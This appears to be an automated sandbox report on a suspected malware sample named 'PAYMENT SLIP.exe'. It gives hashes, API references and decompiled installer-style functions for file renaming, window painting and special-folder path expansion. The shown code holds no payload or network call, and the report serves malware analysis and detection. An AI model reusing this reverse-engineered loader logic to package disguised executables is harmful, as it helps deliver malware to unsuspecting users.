              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
              • String ID: KXCJDFJSKF$N
              • API String ID: 3103080414-3315232752
              • Opcode ID: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
              • Instruction ID: 9740ae806e86bdd9a5d1823962a5ed5927fd13c96e858ba55e5d087808badbab
              • Opcode Fuzzy Hash: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
              • Instruction Fuzzy Hash: EE6193B1900209FFDB10AF60DD85E6A7B69FB84314F00853AFA05B62D1D7789D51CF98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406188, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00406188(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E00406579(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a274 + 0x128)));
						_t12 = E00406032(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B5(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F97(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F97(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FED(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060E4(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406032(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















              0x00406188
              0x00406191
              0x00406198
              0x004061a2
              0x004061b6
              0x004061de
              0x004061e5
              0x004061e9
              0x004061ed
              0x0040620d
              0x00406214
              0x0040621e
              0x0040622b
              0x00406230
              0x00406235
              0x00406239
              0x00406248
              0x0040624a
              0x00406257
              0x0040625b
              0x004062f6
              0x00000000
              0x00406271
              0x0040627e
              0x004062a2
              0x004062a6
              0x004062c5
              0x004062c9
              0x004062c9
              0x004062cb
              0x004062d4
              0x004062df
              0x004062ea
              0x004062f0
              0x00000000
              0x004062f0
              0x004062a8
              0x004062ab
              0x004062b6
              0x004062b2
              0x004062b4
              0x004062b5
              0x004062b5
              0x004062bd
              0x004062bf
              0x00000000
              0x004062bf
              0x00406289
              0x0040628f
              0x00000000
              0x0040628f
              0x0040625b
              0x00406239
              0x004061b8
              0x004061c3
              0x004061cc
              0x004061d0
              0x00000000
              0x00000000
              0x004061d0
              0x00406301

              APIs
              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406323,?,?), ref: 004061C3
              • GetShortPathNameW.KERNEL32 ref: 004061CC
                • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
              • GetShortPathNameW.KERNEL32 ref: 004061E9
              • wsprintfA.USER32 ref: 00406207
              • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406242
              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406251
              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406289
              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 004062DF
              • GlobalFree.KERNEL32 ref: 004062F0
              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F7
                • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\PAYMENT SLIP.exe,80000000,00000003), ref: 00406036
                • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
              • String ID: %ls=%ls$[Rename]$mB$uB$uB
              • API String ID: 2171350718-2295842750
              • Opcode ID: 1370db5916d635a3eaa8287a3a8568cfa6b7ad2c16bbfcffe5a040e030d3314f
              • Instruction ID: 390cd084817c4cf50855a9647c10840f2cfe6cacc919d204b2e4a530669b52c0
              • Opcode Fuzzy Hash: 1370db5916d635a3eaa8287a3a8568cfa6b7ad2c16bbfcffe5a040e030d3314f
              • Instruction Fuzzy Hash: FB312231200715BBC2207B659E49F5B3A9CEF41754F16007FBA42F62C2EA3CD82586BD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
              Download Yara Rule
              C-Code - Quality: 90%
              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a274;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













              0x0040100a
              0x00401039
              0x00401047
              0x0040104d
              0x00401051
              0x0040105b
              0x00401061
              0x00401064
              0x004010f3
              0x00401089
              0x0040108c
              0x004010a6
              0x004010bd
              0x004010cc
              0x004010cf
              0x004010d5
              0x004010d9
              0x004010e4
              0x004010ed
              0x004010ef
              0x004010ef
              0x00401100
              0x00401105
              0x0040110d
              0x00401110
              0x00401112
              0x00401118
              0x0040111f
              0x00401126
              0x00401130
              0x00401142
              0x00401156
              0x00401160
              0x00401165
              0x00401165
              0x00401110
              0x0040116e
              0x00000000
              0x00401178
              0x00401010
              0x00401013
              0x00401015
              0x0040101f
              0x0040101f
              0x00000000

              APIs
              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
              • BeginPaint.USER32(?,?), ref: 00401047
              • GetClientRect.USER32 ref: 0040105B
              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
              • FillRect.USER32 ref: 004010E4
              • DeleteObject.GDI32(?), ref: 004010ED
              • CreateFontIndirectW.GDI32(?), ref: 00401105
              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
              • SelectObject.GDI32(00000000,?), ref: 00401140
              • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
              • SelectObject.GDI32(00000000,00000000), ref: 00401160
              • DeleteObject.GDI32(?), ref: 00401165
              • EndPaint.USER32(?,?), ref: 0040116E
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
              • String ID: F
              • API String ID: 941294808-1304234792
              • Opcode ID: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
              • Instruction ID: 0f43a076eda42f240989ba3bcaaa7122e90b548761b3bfdbbaf4c3cca9648f62
              • Opcode Fuzzy Hash: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
              • Instruction Fuzzy Hash: CF418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7389A55DFA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406579, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
              Download Yara Rule
              C-Code - Quality: 72%
              			E00406579(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x42923c - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x42a2b8 + _t43 * 2;
				_t44 = 0x428200;
				_t110 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E00406579(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x428200;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x42b000;
							E0040653C(_t110, (_t106 << 0xb) + 0x42b000);
						} else {
							E00406483(_t110,  *0x42a268);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E004067EB(_t110);
						}
						goto L43;
					}
					_t86 =  *0x42a26c;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x42a304;
						if( *0x42a304 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x42a264;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x42a268,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x42a268,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110);
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E0040640A( *0x42a2b8, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a2b8 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040);
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E00406579(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E0040653C(_a4, _t44);
			}






























              0x00406579
              0x00406579
              0x00406579
              0x0040657f
              0x00406584
              0x00406595
              0x00406595
              0x0040659d
              0x0040659e
              0x0040659f
              0x004065a0
              0x004065a3
              0x004065ab
              0x004065ad
              0x004065c6
              0x004065c9
              0x004065c9
              0x004067c5
              0x004067c5
              0x004067cb
              0x00000000
              0x00000000
              0x004065d9
              0x004065df
              0x00000000
              0x00000000
              0x004065e7
              0x004065e8
              0x004065ea
              0x004065ee
              0x004065f1
              0x004067b2
              0x004067c0
              0x004067c3
              0x004067c3
              0x004067b4
              0x004067b7
              0x004067ba
              0x004067bc
              0x004067bc
              0x00000000
              0x004067b2
              0x004065f7
              0x004065fa
              0x00406609
              0x00406610
              0x0040661a
              0x0040661e
              0x00406621
              0x00406624
              0x00406629
              0x0040662e
              0x00406632
              0x00406635
              0x00406755
              0x00406759
              0x0040678c
              0x00406790
              0x00406795
              0x0040679a
              0x0040679a
              0x0040679f
              0x004067a0
              0x004067a5
              0x004067a8
              0x004067ab
              0x00000000
              0x004067ab
              0x0040675b
              0x0040675e
              0x00406761
              0x00406776
              0x0040677d
              0x00406763
              0x0040676a
              0x0040676a
              0x00406785
              0x00406788
              0x0040674d
              0x0040674e
              0x0040674e
              0x00000000
              0x00406788
              0x0040663b
              0x00406643
              0x00406645
              0x00406646
              0x0040665f
              0x0040665f
              0x00406666
              0x00406666
              0x0040666d
              0x00406671
              0x00406671
              0x00406672
              0x00406674
              0x004066af
              0x004066b2
              0x004066c2
              0x004066c5
              0x004066cd
              0x004066d3
              0x004066d3
              0x00406730
              0x00406730
              0x00406732
              0x00000000
              0x00000000
              0x004066d7
              0x004066de
              0x004066df
              0x004066e1
              0x004066fb
              0x00406709
              0x0040670f
              0x00406711
              0x0040672c
              0x0040672c
              0x0040672c
              0x00000000
              0x0040672c
              0x00406717
              0x00406722
              0x00406728
              0x0040672a
              0x00000000
              0x00000000
              0x00000000
              0x0040672a
              0x004066e3
              0x004066e6
              0x00000000
              0x00000000
              0x004066f5
              0x004066f7
              0x004066f9
              0x00000000
              0x00000000
              0x00000000
              0x004066f9
              0x00000000
              0x00406730
              0x004066ba
              0x00000000
              0x00406676
              0x00406694
              0x00406699
              0x0040669d
              0x0040673d
              0x0040673d
              0x00406740
              0x00406748
              0x00406748
              0x00000000
              0x00406740
              0x004066a5
              0x00406734
              0x00406734
              0x00406738
              0x00000000
              0x00000000
              0x0040673a
              0x00000000
              0x0040673a
              0x00406674
              0x00406648
              0x0040664d
              0x00000000
              0x00000000
              0x0040664f
              0x00406652
              0x00000000
              0x00000000
              0x00406654
              0x00406657
              0x00000000
              0x00406659
              0x00406659
              0x00000000
              0x00406659
              0x00406657
              0x004067d1
              0x004067dc
              0x004067e8
              0x004067e8
              0x00000000

              APIs
              • GetSystemDirectoryW.KERNEL32(KXCJDFJSKF,00000400), ref: 004066BA
              • GetWindowsDirectoryW.KERNEL32(KXCJDFJSKF,00000400,00000000,00422728,?,004055DB,00422728,00000000), ref: 004066CD
              • SHGetSpecialFolderLocation.SHELL32(004055DB,00000000,00000000,00422728,?,004055DB,00422728,00000000), ref: 00406709
              • SHGetPathFromIDListW.SHELL32(00000000,KXCJDFJSKF), ref: 00406717
              • CoTaskMemFree.OLE32(00000000), ref: 00406722
              • lstrcatW.KERNEL32(KXCJDFJSKF,\Microsoft\Internet Explorer\Quick Launch), ref: 00406748
              • lstrlenW.KERNEL32(KXCJDFJSKF,00000000,00422728,?,004055DB,00422728,00000000), ref: 004067A0
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
              • String ID: KXCJDFJSKF$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
              • API String ID: 717251189-2443651505
              • Opcode ID: 461394275e41b2543b5fd82fcf6b9832f1e7dc77c54885fbf13ec40e6163d1f3
              • Instruction ID: 6f5f2b99d90c7511299ba9a64344c15edde84ad84532d0df03b232db96096e81
              • Opcode Fuzzy Hash: 461394275e41b2543b5fd82fcf6b9832f1e7dc77c54885fbf13ec40e6163d1f3
              • Instruction Fuzzy Hash: BA613671601111ABDF209F14DD80AAE37A5AF10718F52403FE943B72D0DB3E5AA6CB5D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004055A4, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004055A4(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a334;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406579(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















              0x004055aa
              0x004055b4
              0x004055b9
              0x004055bf
              0x004055ca
              0x004055cd
              0x004055d0
              0x004055d6
              0x004055d6
              0x004055dc
              0x004055e4
              0x004055e7
              0x00405604
              0x00405608
              0x00405611
              0x00405611
              0x0040561b
              0x00405624
              0x00405630
              0x00405637
              0x0040563b
              0x0040563e
              0x00405651
              0x0040565f
              0x0040565f
              0x00405663
              0x00405665
              0x00405668
              0x00000000
              0x00405668
              0x004055e9
              0x004055f1
              0x004055f9
              0x004055ff
              0x00000000
              0x004055ff
              0x004055f9
              0x004055e7
              0x00405674

              APIs
              • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
              • lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
              • lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
              • SetWindowTextW.USER32(00422728,00422728), ref: 00405611
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$lstrlen$TextWindowlstrcat
              • String ID: ('B
              • API String ID: 2531174081-2332581011
              • Opcode ID: 8d4ec48a8783ac7c02cf808f938a66a70b9f0af433ef19620f9c759a8ff7b601
              • Instruction ID: cea8892cb4e31635aa5f40387e4ea582d2b984c796fabda61e5f1d3d18a4122e
              • Opcode Fuzzy Hash: 8d4ec48a8783ac7c02cf808f938a66a70b9f0af433ef19620f9c759a8ff7b601
              • Instruction Fuzzy Hash: E6218E71900518BACB119F65DD44ECFBFB9EF45360F54443AF904B62A0C77A4A508FA8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004067EB, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
              Download Yara Rule
              C-Code - Quality: 91%
              			E004067EB(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E88(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E3E(L"*?|<>/\":", _t5))) == 0) {
							E00405FED(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








              0x004067ed
              0x004067f6
              0x0040680d
              0x0040680d
              0x00406814
              0x00406820
              0x00406820
              0x00406823
              0x00406826
              0x0040682b
              0x0040682d
              0x00406836
              0x0040683a
              0x00406857
